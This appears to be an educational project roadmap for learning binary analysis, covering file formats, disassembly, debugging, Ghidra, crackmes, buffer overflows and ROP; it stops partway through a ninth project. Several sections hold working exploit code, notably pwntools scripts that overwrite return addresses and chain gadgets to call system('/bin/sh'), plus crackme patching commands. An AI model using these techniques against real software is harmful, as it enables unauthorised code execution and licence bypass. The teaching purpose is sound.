← Back to all projects

LEARN BINARY ANALYSIS

Learn Binary Analysis: From Zero to Reverse Engineering Master

Goal: Deeply understand binary analysis—from file formats and assembly to disassembly, debugging, exploitation, malware analysis, and building your own reverse engineering tools.


Why Learn Binary Analysis?

Binary analysis is the art of understanding compiled programs without source code. It’s the foundation of:

  • Security Research: Finding vulnerabilities in closed-source software
  • Malware Analysis: Understanding what malicious software does
  • CTF Competitions: Binary exploitation (pwn) challenges
  • Game Hacking/Modding: Reverse engineering game mechanics
  • Software Archaeology: Understanding legacy systems
  • Compiler Development: Seeing how high-level code becomes machine code

After completing these projects, you will:

  • Read and understand x86/x64 assembly fluently
  • Analyze any binary file format (ELF, PE, Mach-O)
  • Use professional tools (Ghidra, IDA, radare2, GDB)
  • Exploit buffer overflows and build ROP chains
  • Analyze malware safely and effectively
  • Build your own disassembler and analysis tools

Core Concept Analysis

The Binary Analysis Landscape

┌─────────────────────────────────────────────────────────────────────────┐
│                        SOURCE CODE (if available)                        │
│                                                                          │
│   int main() {                                                          │
│       char buf[64];                                                     │
│       gets(buf);        // Vulnerable!                                  │
│       return 0;                                                         │
│   }                                                                      │
└─────────────────────────────────────────────────────────────────────────┘
                                 │
                                 ▼ Compilation
┌─────────────────────────────────────────────────────────────────────────┐
│                        BINARY EXECUTABLE                                 │
│                                                                          │
│   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00   .ELF............   │
│   03 00 3e 00 01 00 00 00 40 10 00 00 00 00 00 00   ..>.....@.......   │
│   ...                                                                    │
└─────────────────────────────────────────────────────────────────────────┘
                                 │
          ┌──────────────────────┼──────────────────────┐
          ▼                      ▼                      ▼
┌──────────────────┐  ┌──────────────────┐  ┌──────────────────┐
│ STATIC ANALYSIS  │  │ DYNAMIC ANALYSIS │  │   EXPLOITATION   │
│                  │  │                  │  │                  │
│ • Disassembly    │  │ • Debugging      │  │ • Buffer Overflow│
│ • Decompilation  │  │ • Tracing        │  │ • ROP Chains     │
│ • CFG Analysis   │  │ • Instrumentation│  │ • Shellcode      │
│ • String Search  │  │ • Emulation      │  │ • Format Strings │
└──────────────────┘  └──────────────────┘  └──────────────────┘

Key Concepts Explained

1. Binary File Formats

ELF (Executable and Linkable Format) - Linux/Unix

┌──────────────────────────────────────────┐
│             ELF Header (64 bytes)        │
│  • Magic: 0x7F 'E' 'L' 'F'               │
│  • Class: 32-bit or 64-bit               │
│  • Entry point address                    │
│  • Program header offset                  │
│  • Section header offset                  │
├──────────────────────────────────────────┤
│         Program Header Table             │
│  (Segments - runtime view)               │
│  • PT_LOAD: Loadable segments            │
│  • PT_DYNAMIC: Dynamic linking info      │
│  • PT_INTERP: Interpreter path           │
├──────────────────────────────────────────┤
│              Sections                     │
│  .text    - Executable code              │
│  .data    - Initialized data             │
│  .bss     - Uninitialized data           │
│  .rodata  - Read-only data (strings)     │
│  .plt     - Procedure Linkage Table      │
│  .got     - Global Offset Table          │
│  .symtab  - Symbol table                 │
│  .strtab  - String table                 │
├──────────────────────────────────────────┤
│         Section Header Table             │
│  (Sections - linking view)               │
└──────────────────────────────────────────┘

PE (Portable Executable) - Windows

┌──────────────────────────────────────────┐
│           DOS Header                      │
│  • Magic: 'MZ' (0x5A4D)                  │
│  • e_lfanew: Offset to PE header         │
├──────────────────────────────────────────┤
│           DOS Stub                        │
│  "This program cannot be run in DOS mode"│
├──────────────────────────────────────────┤
│           PE Signature: "PE\0\0"         │
├──────────────────────────────────────────┤
│           COFF File Header               │
│  • Machine type (x86, x64, ARM)          │
│  • Number of sections                     │
│  • Timestamp                             │
├──────────────────────────────────────────┤
│        Optional Header (PE32/PE32+)      │
│  • Entry point (AddressOfEntryPoint)     │
│  • ImageBase (preferred load address)    │
│  • Data directories (imports, exports)   │
├──────────────────────────────────────────┤
│           Section Headers                 │
│  .text   - Code                          │
│  .data   - Initialized data              │
│  .rdata  - Read-only data, imports       │
│  .rsrc   - Resources (icons, dialogs)    │
└──────────────────────────────────────────┘

2. x86/x64 Assembly Fundamentals

Registers (x64)

General Purpose (64-bit):
┌─────────────────────────────────────────────────────────────┐
│ RAX (accumulator)      │ Return values, arithmetic          │
│ RBX (base)             │ Callee-saved, general purpose      │
│ RCX (counter)          │ Arg 4, loop counter                │
│ RDX (data)             │ Arg 3, I/O, multiplication         │
│ RSI (source index)     │ Arg 2, string source               │
│ RDI (destination)      │ Arg 1, string destination          │
│ RBP (base pointer)     │ Stack frame base (callee-saved)    │
│ RSP (stack pointer)    │ Current stack top                  │
│ R8-R15                 │ Additional registers (R8-R11 args) │
└─────────────────────────────────────────────────────────────┘

Special Registers:
┌─────────────────────────────────────────────────────────────┐
│ RIP (instruction ptr)  │ Address of next instruction        │
│ RFLAGS                 │ Status flags (ZF, CF, SF, OF)      │
└─────────────────────────────────────────────────────────────┘

Register Sizes:
┌─────────────────────────────────────────────────────────────┐
│ 64-bit │ 32-bit │ 16-bit │ 8-bit high │ 8-bit low │
│  RAX   │  EAX   │   AX   │     AH     │    AL     │
│  RBX   │  EBX   │   BX   │     BH     │    BL     │
│  RCX   │  ECX   │   CX   │     CH     │    CL     │
│  RDX   │  EDX   │   DX   │     DH     │    DL     │
└─────────────────────────────────────────────────────────────┘

Calling Conventions

Linux x64 (System V AMD64 ABI):
  Arguments: RDI, RSI, RDX, RCX, R8, R9 (then stack)
  Return:    RAX (and RDX for 128-bit)
  Caller-saved: RAX, RCX, RDX, RSI, RDI, R8-R11
  Callee-saved: RBX, RBP, R12-R15

Windows x64:
  Arguments: RCX, RDX, R8, R9 (then stack, with shadow space)
  Return:    RAX
  Caller-saved: RAX, RCX, RDX, R8-R11
  Callee-saved: RBX, RBP, RDI, RSI, R12-R15

Common Instructions

; Data Movement
mov  rax, rbx       ; rax = rbx
lea  rax, [rbx+8]   ; rax = address of rbx+8 (load effective address)
push rax            ; Push rax onto stack
pop  rax            ; Pop top of stack into rax

; Arithmetic
add  rax, rbx       ; rax = rax + rbx
sub  rax, rbx       ; rax = rax - rbx
imul rax, rbx       ; rax = rax * rbx (signed)
xor  rax, rax       ; rax = 0 (clear register, common idiom)

; Comparison & Jumps
cmp  rax, rbx       ; Compare (sets flags)
test rax, rax       ; AND without storing (sets ZF if rax == 0)
jmp  label          ; Unconditional jump
je   label          ; Jump if equal (ZF=1)
jne  label          ; Jump if not equal (ZF=0)
jl   label          ; Jump if less (signed)
jg   label          ; Jump if greater (signed)

; Function Calls
call func           ; Push return address, jump to func
ret                 ; Pop return address, jump to it

; System Calls (Linux x64)
syscall             ; Invoke kernel (syscall number in RAX)

3. Stack Layout (x64)

High addresses
┌──────────────────────────────────────────┐
│           Previous Stack Frame           │
├──────────────────────────────────────────┤
│              Return Address              │  ← Pushed by CALL
├──────────────────────────────────────────┤
│              Saved RBP                   │  ← Pushed by function prologue
├──────────────────────────────────────────┤  ← RBP points here
│              Local Variable 1            │
├──────────────────────────────────────────┤
│              Local Variable 2            │
├──────────────────────────────────────────┤
│              Buffer (e.g., char[64])     │
├──────────────────────────────────────────┤  ← RSP points here
│              (Stack grows down)          │
└──────────────────────────────────────────┘
Low addresses

Function Prologue:
    push rbp          ; Save old base pointer
    mov  rbp, rsp     ; Set new base pointer
    sub  rsp, N       ; Allocate N bytes for locals

Function Epilogue:
    mov  rsp, rbp     ; Restore stack pointer
    pop  rbp          ; Restore old base pointer
    ret               ; Return to caller

4. Buffer Overflow Basics

Normal execution:
┌─────────────┐
│ Return Addr │ → points to caller
├─────────────┤
│ Saved RBP   │
├─────────────┤
│ Buffer[64]  │ ← User input goes here
└─────────────┘

After overflow:
┌─────────────┐
│ AAAA...AAAA │ ← Overwritten return address!
├─────────────┤     Now points to attacker code
│ AAAA...AAAA │ ← Overwritten saved RBP
├─────────────┤
│ AAAAAAAAAA  │ ← Original buffer, filled with 'A's
│ AAAAAAAAAA  │
│ AAAAAAAAAA  │
└─────────────┘

5. Static vs Dynamic Analysis

Aspect Static Analysis Dynamic Analysis
Execution No execution Runs the binary
Tools Disassembler, Decompiler Debugger, Tracer
Pros Safe, complete coverage See actual behavior
Cons Can’t see runtime values May miss code paths
Examples Ghidra, IDA, radare2 GDB, strace, ltrace

6. Modern Protections

┌─────────────────────────────────────────────────────────────┐
│ Protection           │ What it does                         │
├─────────────────────────────────────────────────────────────┤
│ ASLR                 │ Randomize memory layout              │
│ Stack Canary         │ Detect stack buffer overflows        │
│ NX/DEP               │ Non-executable stack/heap            │
│ PIE                  │ Position-independent executable      │
│ RELRO                │ Read-only GOT after relocation       │
│ CFI                  │ Control-flow integrity               │
└─────────────────────────────────────────────────────────────┘

Check protections with checksec:
$ checksec --file=./binary
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Project List

The following 18 projects will teach you binary analysis from fundamentals to advanced techniques.


Project 1: ELF File Parser

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python, Rust, Go
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Binary Formats / File Parsing
  • Software or Tool: ELF binaries, hex editor
  • Main Book: “Practical Binary Analysis” by Dennis Andriesse

What you’ll build: A command-line tool that parses ELF files and displays all headers, sections, segments, symbols, and relocations in a human-readable format—like a simplified readelf.

Why it teaches binary analysis: Every reverse engineering task starts with understanding the file format. Building a parser forces you to understand every byte of the ELF structure.

Core challenges you’ll face:

  • Parsing the ELF header → maps to understanding magic bytes, class (32/64-bit), endianness
  • Reading program headers → maps to segments, what gets loaded into memory
  • Reading section headers → maps to sections, symbols, strings
  • Handling different architectures → maps to x86, ARM, MIPS variations

Resources for key challenges:

  • Linux Audit - ELF Binaries - Excellent overview
  • “Practical Binary Analysis” Chapter 2 - Comprehensive ELF explanation
  • man elf - The ELF specification

Key Concepts:

  • ELF Header Structure: “Practical Binary Analysis” Ch. 2 - Andriesse
  • Program vs Section Headers: elf(5) man page
  • Symbol Tables: “Learning ELF” - Can Ozkan (Medium)

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: C programming, understanding of pointers and structs, familiarity with hexadecimal

Real world outcome:

$ ./elf_parser /bin/ls
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:   ELF64
  Data:    2's complement, little endian
  Version: 1 (current)
  OS/ABI:  UNIX - System V
  Type:    DYN (Shared object file)
  Machine: AMD x86-64
  Entry:   0x6b10

Program Headers:
  Type           Offset   VirtAddr         FileSiz  MemSiz   Flg
  PHDR           0x000040 0x0000000000000040 0x0002d8 0x0002d8 R
  INTERP         0x000318 0x0000000000000318 0x00001c 0x00001c R
  LOAD           0x000000 0x0000000000000000 0x003510 0x003510 R
  ...

Sections:
  [Nr] Name              Type       Address          Size
  [ 0]                   NULL       0x0000000000000000 0x0
  [ 1] .interp           PROGBITS   0x0000000000000318 0x1c
  [ 2] .note.gnu.build-id NOTE      0x0000000000000338 0x24
  ...

Symbols:
  Num:    Value          Size Type    Bind   Name
    1: 0000000000000000     0 FUNC    GLOBAL printf@GLIBC_2.2.5
    2: 0000000000006b10   123 FUNC    GLOBAL main
  ...

Implementation Hints:

Start by mapping the ELF header structure:

// Don't write code, but understand this structure:
// Elf64_Ehdr contains:
//   e_ident[16]  - Magic number and other info
//   e_type       - Object file type (ET_EXEC, ET_DYN, etc.)
//   e_machine    - Architecture (EM_X86_64, EM_ARM, etc.)
//   e_entry      - Entry point virtual address
//   e_phoff      - Program header table file offset
//   e_shoff      - Section header table file offset
//   e_phnum      - Number of program headers
//   e_shnum      - Number of section headers

Questions to guide your implementation:

  1. How do you detect if a file is 32-bit or 64-bit ELF?
  2. How do you find the string table section to get section names?
  3. What’s the difference between .dynsym and .symtab?
  4. How do program headers map sections to memory segments?

Learning milestones:

  1. Parse ELF header correctly → Understand file identification
  2. Iterate program headers → Understand runtime memory layout
  3. Iterate section headers → Understand linking and symbols
  4. Resolve symbol names → Understand string tables

Project 2: PE File Parser

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python, Rust
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Binary Formats / Windows Executables
  • Software or Tool: PE files, Windows or Wine
  • Main Book: “Practical Malware Analysis” by Sikorski & Honig

What you’ll build: A PE file parser that extracts headers, sections, imports, exports, and resources from Windows executables.

Why it teaches binary analysis: Windows malware analysis requires understanding PE format. Most real-world targets are Windows binaries.

Core challenges you’ll face:

  • DOS header and stub → maps to legacy compatibility
  • COFF and Optional headers → maps to PE32 vs PE32+
  • Import Address Table (IAT) → maps to dynamic linking, API calls
  • Export directory → maps to DLL functions

Resources for key challenges:

Key Concepts:

  • PE Structure: “Practical Malware Analysis” Ch. 1
  • Import Table: PE Format specification
  • Resources: CFF Explorer documentation

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Project 1 (ELF Parser), understanding of Windows APIs

Real world outcome:

$ ./pe_parser suspicious.exe
DOS Header:
  Magic: MZ (0x5a4d)
  PE Offset: 0x100

PE Header:
  Signature: PE (0x4550)
  Machine: x64 (0x8664)
  Sections: 5
  Timestamp: 2024-01-15 14:32:01

Optional Header:
  Magic: PE32+ (0x20b)
  Entry Point: 0x1400012a0
  Image Base: 0x140000000

Sections:
  Name     VirtAddr   VirtSize   RawSize    Flags
  .text    0x1000     0x5a00     0x5c00     CODE,EXECUTE,READ
  .rdata   0x7000     0x1e00     0x2000     READ
  .data    0x9000     0x400      0x200      READ,WRITE

Imports:
  KERNEL32.dll:
    - CreateFileA
    - ReadFile
    - WriteFile
    - VirtualAlloc    ← Suspicious!
  WS2_32.dll:
    - socket          ← Network activity!
    - connect
    - send
    - recv

Implementation Hints:

The PE format has a layered structure. Parse it step by step:

  1. Read DOS header at offset 0
  2. Follow e_lfanew to find PE signature
  3. Parse COFF header immediately after signature
  4. Parse Optional Header (size varies by PE32 vs PE32+)
  5. Parse section headers after Optional Header
  6. Use Data Directories to find imports, exports, resources

Key questions:

  • What does IMAGE_DIRECTORY_ENTRY_IMPORT point to?
  • How are imported function names resolved (hint: thunks)?
  • What’s the difference between RVA and file offset?

Learning milestones:

  1. Parse headers correctly → Understand PE structure
  2. Extract imports → See what APIs the program uses
  3. Extract exports → Understand DLLs
  4. Handle both PE32 and PE32+ → Support all Windows binaries

Project 3: Build a Simple Disassembler

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python (with Capstone), Rust
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Disassembly / x86 Instruction Encoding
  • Software or Tool: Intel manuals, Capstone engine
  • Main Book: “Intel 64 and IA-32 Architectures Software Developer’s Manual”

What you’ll build: A disassembler that converts x86/x64 machine code into human-readable assembly instructions.

Why it teaches binary analysis: Understanding how machine code maps to assembly is fundamental. Building a disassembler forces you to understand instruction encoding.

Core challenges you’ll face:

  • Variable-length instructions → maps to x86 has 1-15 byte instructions
  • Prefixes and REX bytes → maps to operand size, 64-bit registers
  • ModR/M and SIB bytes → maps to addressing modes
  • Immediate and displacement → maps to constants and offsets

Resources for key challenges:

Key Concepts:

  • x86 Instruction Format: Intel SDM Volume 2, Chapter 2
  • ModR/M Encoding: X86 Opcode Reference
  • Linear vs Recursive Descent: “Practical Binary Analysis” Ch. 6

Difficulty: Advanced Time estimate: 2-4 weeks Prerequisites: Projects 1-2, solid x86 assembly knowledge

Real world outcome:

$ ./disasm program.bin
00000000: 55                    push rbp
00000001: 48 89 e5              mov rbp, rsp
00000004: 48 83 ec 40           sub rsp, 0x40
00000008: 48 8d 45 c0           lea rax, [rbp-0x40]
0000000c: 48 89 c7              mov rdi, rax
0000000f: e8 xx xx xx xx        call 0x????????
00000014: 31 c0                 xor eax, eax
00000016: c9                    leave
00000017: c3                    ret

Implementation Hints:

x86 instruction format:

[Prefixes] [REX] [Opcode] [ModR/M] [SIB] [Displacement] [Immediate]
   0-4       0-1    1-3      0-1     0-1      0-4           0-8

Start simple:

  1. Handle single-byte opcodes first (push, pop, ret, nop)
  2. Add instructions with ModR/M byte (mov, add, sub)
  3. Add REX prefix support for 64-bit
  4. Add SIB byte for complex addressing
  5. Handle prefixes (operand size, segment override)

Questions to consider:

  • How do you distinguish mov eax, ebx from mov eax, [ebx]?
  • What does the REX.W prefix do?
  • How do you handle instructions with the same opcode but different meanings?

Learning milestones:

  1. Disassemble basic instructions → Single-byte opcodes work
  2. Handle ModR/M byte → Register and memory operands
  3. Support 64-bit mode → REX prefix parsing
  4. Handle all addressing modes → SIB byte, displacements

Project 4: GDB Debugging Deep Dive

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (for targets), GDB commands
  • Alternative Programming Languages: Python (GDB scripting)
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Debugging / Dynamic Analysis
  • Software or Tool: GDB, pwndbg/GEF, GCC
  • Main Book: “The Art of Debugging with GDB” by Matloff & Salzman

What you’ll build: A series of increasingly complex debugging exercises, culminating in a GDB Python extension for automated analysis.

Why it teaches binary analysis: Debugging is the most direct way to understand program behavior. GDB is the most powerful open-source debugger.

Core challenges you’ll face:

  • Setting breakpoints → maps to controlling execution
  • Examining memory → maps to understanding data layout
  • Stepping through code → maps to following control flow
  • Scripting with Python → maps to automating analysis

Resources for key challenges:

Key Concepts:

  • Breakpoints and Watchpoints: GDB documentation
  • Memory Examination: “The Art of Debugging” Ch. 3
  • Python GDB API: GDB Python documentation

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Basic C, assembly basics

Real world outcome:

$ gdb ./target_binary
(gdb) break main
(gdb) run
(gdb) disassemble
(gdb) info registers
(gdb) x/20x $rsp           # Examine stack
(gdb) x/s 0x402000         # Examine string
(gdb) set $rax = 0x1337    # Modify register
(gdb) python
>>> gdb.execute("info registers")
>>> frame = gdb.selected_frame()
>>> print(frame.read_register("rip"))
>>> end
(gdb) continue

Implementation Hints:

Essential GDB commands to master:

# Execution control
run [args]           # Start program
continue (c)         # Continue execution
stepi (si)           # Step one instruction
nexti (ni)           # Step over calls
finish               # Run until function returns

# Breakpoints
break *0x401000      # Break at address
break main           # Break at function
watch *0x7ffd1234    # Break on memory write
catch syscall write  # Break on syscall

# Examination
disassemble main     # Show assembly
info registers       # All registers
x/10i $rip           # 10 instructions at RIP
x/20wx $rsp          # 20 words at stack
x/s 0x402000         # String at address
info proc mappings   # Memory layout

# Modification
set $rax = 0         # Change register
set *(int*)0x401000 = 0x90909090  # Patch memory

Create exercises:

  1. Find a hidden password in a crackme
  2. Trace a function’s execution
  3. Modify a return value to bypass a check
  4. Write a GDB script to log all function calls

Learning milestones:

  1. Basic debugging → Set breakpoints, step, examine
  2. Memory analysis → Understand stack and heap layout
  3. Modify execution → Change registers and memory
  4. Python scripting → Automate repetitive tasks

Project 5: Ghidra Reverse Engineering

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Java (for scripts), Ghidra
  • Alternative Programming Languages: Python (Ghidrathon)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 2. The “Micro-SaaS / Pro Tool”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Static Analysis / Decompilation
  • Software or Tool: Ghidra (NSA), sample binaries
  • Main Book: “Ghidra Software Reverse Engineering for Beginners”

What you’ll build: Complete reverse engineering of several binaries of increasing complexity, including writing Ghidra scripts for automation.

Why it teaches binary analysis: Ghidra is the industry-standard free tool. Its decompiler produces C-like code from assembly, dramatically speeding up analysis.

Core challenges you’ll face:

  • Navigating Ghidra’s UI → maps to efficient workflow
  • Using the decompiler → maps to understanding control flow
  • Cross-references → maps to finding function usage
  • Writing scripts → maps to automating analysis

Resources for key challenges:

Key Concepts:

  • Code Browser: Ghidra documentation
  • Decompiler Window: “Ghidra RE for Beginners” Ch. 4
  • Ghidra Scripting: Ghidra API documentation

Difficulty: Intermediate Time estimate: 2-3 weeks Prerequisites: Projects 1-4, solid assembly knowledge

Real world outcome:

Analyzing a CTF crackme in Ghidra:

1. Load binary → Auto-analysis runs
2. Find main() → Entry point analysis
3. Decompile main() → See C-like code:

   int main(int argc, char **argv) {
       char input[32];
       printf("Enter password: ");
       scanf("%s", input);
       if (check_password(input)) {
           printf("Correct!\n");
       } else {
           printf("Wrong!\n");
       }
       return 0;
   }

4. Analyze check_password() → Find algorithm
5. Write keygen or patch binary

Implementation Hints:

Ghidra workflow:

  1. Create project → Import binary
  2. Let auto-analysis complete
  3. Navigate with ‘G’ (goto address) or symbol tree
  4. Use ‘L’ to rename functions/variables
  5. Use ‘;’ to add comments
  6. Use ‘X’ to find cross-references

Scripting example (Ghidra Python):

# Find all calls to dangerous functions
dangerous = ["gets", "strcpy", "sprintf"]
for func_name in dangerous:
    func = getFunction(func_name)
    if func:
        refs = getReferencesTo(func.getEntryPoint())
        for ref in refs:
            print(f"Call to {func_name} at {ref.getFromAddress()}")

Learning milestones:

  1. Navigate efficiently → Find functions, strings, imports
  2. Understand decompiler output → Read C-like code
  3. Rename and annotate → Make code understandable
  4. Write scripts → Automate repetitive analysis

Project 6: Crackme Challenges

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly analysis, Python for keygens
  • Alternative Programming Languages: Any
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Reverse Engineering / Password Bypass
  • Software or Tool: Ghidra, GDB, crackmes.one
  • Main Book: “Reversing: Secrets of Reverse Engineering” by Eldad Eilam

What you’ll build: Solve 10+ crackme challenges of increasing difficulty, learning patching, keygen writing, and anti-debugging bypass.

Why it teaches binary analysis: Crackmes are purpose-built learning tools. They teach you to find and understand password checks, then bypass them.

Core challenges you’ll face:

  • Finding the check → maps to string references, control flow
  • Understanding the algorithm → maps to decompilation, debugging
  • Patching vs keygen → maps to two approaches to bypass
  • Anti-debugging → maps to detection evasion

Resources for key challenges:

Key Concepts:

  • Patching: Tutorial #10 - The Levels of Patching
  • Keygen Writing: “Reversing” Ch. 5 - Eilam
  • Anti-Debugging Bypass: OpenRCE Anti-Reversing Database

Difficulty: Intermediate Time estimate: 2-4 weeks Prerequisites: Projects 4-5 (GDB, Ghidra)

Real world outcome:

# Approach 1: Patching
$ ./crackme
Enter password: wrong
Access Denied!

# Found the check: JNE (jump if not equal) to fail
# Patch JNE to JE (or NOP it out)
$ xxd crackme | grep "75 28"
00001234: 75 28  # JNE +0x28
$ printf '\x90\x90' | dd of=crackme bs=1 seek=4660 conv=notrunc
$ ./crackme
Enter password: anything
Access Granted!

# Approach 2: Keygen
# Found algorithm: password = (username XOR 0x55) + 0x1337
$ python3 keygen.py "admin"
Valid password for 'admin': 0xAB12CD34

Implementation Hints:

Systematic approach:

  1. Run the binary to understand expected behavior
  2. Find strings (“Enter password”, “Access Denied”)
  3. Find cross-references to those strings
  4. Trace backwards to find the comparison
  5. Understand what makes it pass
  6. Either patch the jump or write a keygen

Patching levels:

  1. LAME: NOP out the check entirely
  2. Better: Invert the jump condition
  3. Good: Patch the comparison to always succeed
  4. Best: Understand algorithm, write keygen

Questions:

  • What’s the difference between JE and JNE?
  • How do you find the password comparison in decompiled code?
  • What are common string comparison functions?

Learning milestones:

  1. Solve easy crackmes → Find obvious password checks
  2. Understand algorithms → XOR, hashing, encoding
  3. Write keygens → Reverse the algorithm
  4. Bypass protections → Handle obfuscation

Project 7: Buffer Overflow Exploitation

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (targets), Python (exploits)
  • Alternative Programming Languages: Assembly for shellcode
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Binary Exploitation / Memory Corruption
  • Software or Tool: GDB, pwntools, checksec
  • Main Book: “Hacking: The Art of Exploitation” by Jon Erickson

What you’ll build: Working exploits for buffer overflow vulnerabilities, progressing from simple stack smashing to bypass ASLR and stack canaries.

Why it teaches binary analysis: Understanding exploitation gives you insight into why security mitigations exist and how low-level memory works.

Core challenges you’ll face:

  • Finding the offset → maps to pattern generation, EIP/RIP control
  • Controlling execution → maps to return address overwrite
  • Bypassing NX → maps to return-to-libc, ROP
  • Bypassing ASLR → maps to info leaks, partial overwrite

Resources for key challenges:

Key Concepts:

  • Stack Layout: “Hacking: Art of Exploitation” Ch. 2
  • Shellcode: “Hacking: Art of Exploitation” Ch. 5
  • Return-Oriented Programming: “Practical Binary Analysis” Ch. 10

Difficulty: Advanced Time estimate: 3-4 weeks Prerequisites: Projects 1-6, solid C and assembly

Real world outcome:

from pwn import *

# Connect to target
p = process('./vulnerable')

# Find offset with pattern
offset = 72

# Build payload
payload = b'A' * offset           # Fill buffer
payload += p64(0x401337)          # Overwrite return address with win()

# Send payload
p.sendline(payload)

# Get shell!
p.interactive()

# Output:
# [*] Switching to interactive mode
# $ whoami
# root
# $ cat flag.txt
# FLAG{buffer_overflow_mastered}

Implementation Hints:

Progression:

  1. ret2win: Overwrite return address to call win() function
  2. ret2shellcode: Jump to shellcode on stack (no NX)
  3. ret2libc: Return to system("/bin/sh") (bypass NX)
  4. ROP chain: Chain gadgets for complex operations
  5. GOT overwrite: Hijack function pointers
  6. Format string: Arbitrary read/write

Finding offset:

from pwn import *

# Generate cyclic pattern
pattern = cyclic(200)
# Feed to program, get crash address
# Use cyclic_find to get offset
offset = cyclic_find(0x61616168)  # 'haaa' in little-endian

Key questions:

  • How do you find the offset to the return address?
  • What’s the difference between 32-bit and 64-bit exploitation?
  • How do you find useful libc functions when ASLR is enabled?

Learning milestones:

  1. Control EIP/RIP → Overwrite return address
  2. Execute shellcode → Spawn a shell (no NX)
  3. ROP chains → Bypass NX with gadgets
  4. Leak addresses → Bypass ASLR

Project 8: Return-Oriented Programming (ROP)

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python (pwntools)
  • Alternative Programming Languages: Assembly understanding
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 4: Expert
  • Knowledge Area: Advanced Exploitation / Code Reuse
  • Software or Tool: ROPgadget, ropper, pwntools
  • Main Book: “The Shellcoder’s Handbook”

What you’ll build: Complex ROP chains that bypass NX protection by chaining together code snippets already in the binary.

Why it teaches binary analysis: ROP is the foundation of modern exploitation. It demonstrates deep understanding of calling conventions and code reuse.

Core challenges you’ll face:

  • Finding gadgets → maps to instruction sequences ending in ret
  • Chaining gadgets → maps to building functionality from fragments
  • Setting up arguments → maps to calling conventions (rdi, rsi, rdx)
  • Calling system() → maps to executing /bin/sh

Resources for key challenges:

Key Concepts:

  • Gadget Types: “The Shellcoder’s Handbook” Ch. 9
  • x64 Calling Convention: System V ABI
  • Stack Pivoting: ROP Emporium tutorials

Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Project 7 (Buffer Overflow)

Real world outcome:

from pwn import *

elf = ELF('./target')
libc = ELF('./libc.so.6')
rop = ROP(elf)

# Find gadgets
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Leak libc address
payload = flat(
    b'A' * offset,
    pop_rdi,
    elf.got['puts'],    # Argument: puts@GOT
    elf.plt['puts'],    # Call puts to leak
    elf.symbols['main'] # Return to main for second stage
)

p.sendline(payload)
leaked = u64(p.recv(6).ljust(8, b'\x00'))
libc.address = leaked - libc.symbols['puts']

# Second stage: call system("/bin/sh")
bin_sh = next(libc.search(b'/bin/sh'))
system = libc.symbols['system']

payload2 = flat(
    b'A' * offset,
    ret,                # Stack alignment
    pop_rdi,
    bin_sh,
    system
)

p.sendline(payload2)
p.interactive()

Implementation Hints:

Gadget hunting:

$ ROPgadget --binary ./target | grep "pop rdi"
0x00401233 : pop rdi ; ret
$ ROPgadget --binary ./target | grep "pop rsi"
0x00401231 : pop rsi ; pop r15 ; ret

Common ROP patterns:

  1. Leak libc: Call puts(GOT_entry) to leak address
  2. Calculate libc base: leaked_addr - offset = libc_base
  3. Find /bin/sh: Search libc for “/bin/sh” string
  4. Call system: pop rdi; ret + “/bin/sh” addr + system addr

Stack alignment:

  • x64 requires 16-byte stack alignment before call
  • Add a ret gadget if system() crashes

Learning milestones:

  1. Find gadgets → Use ROPgadget or ropper
  2. Chain simple ROP → Control function arguments
  3. Leak libc → Bypass ASLR
  4. Get shell → Complete exploitation chain

Project 9: Dynamic Analysis with strace/ltrace

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Command line tools
  • Alternative Programming Languages: Python for automation
  • Coolness Level: Level 2: Practical but Forgettable
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 1: Beginner
  • Knowledge Area: Dynamic Analysis / System Calls
  • Software or Tool: strace, ltrace, Linux
  • Main Book: “The Linux Programming Interface” by Michael Kerrisk

What you’ll build: Analyze unknown binaries using only system call and library call tracing, without disassembly.

Why it teaches binary analysis: Sometimes you don’t need disassembly. Seeing what files a program opens and what APIs it calls reveals a lot.

Core challenges you’ll face:

  • Understanding syscall output → maps to knowing what each syscall does
  • Filtering noise → maps to focusing on interesting calls
  • Following child processes → maps to fork/exec tracing
  • Interpreting library calls → maps to understanding libc functions

Resources for key challenges:

Key Concepts:

  • System Calls: “The Linux Programming Interface” Ch. 3
  • Library Calls: ltrace man page
  • Process Tracing: strace man page

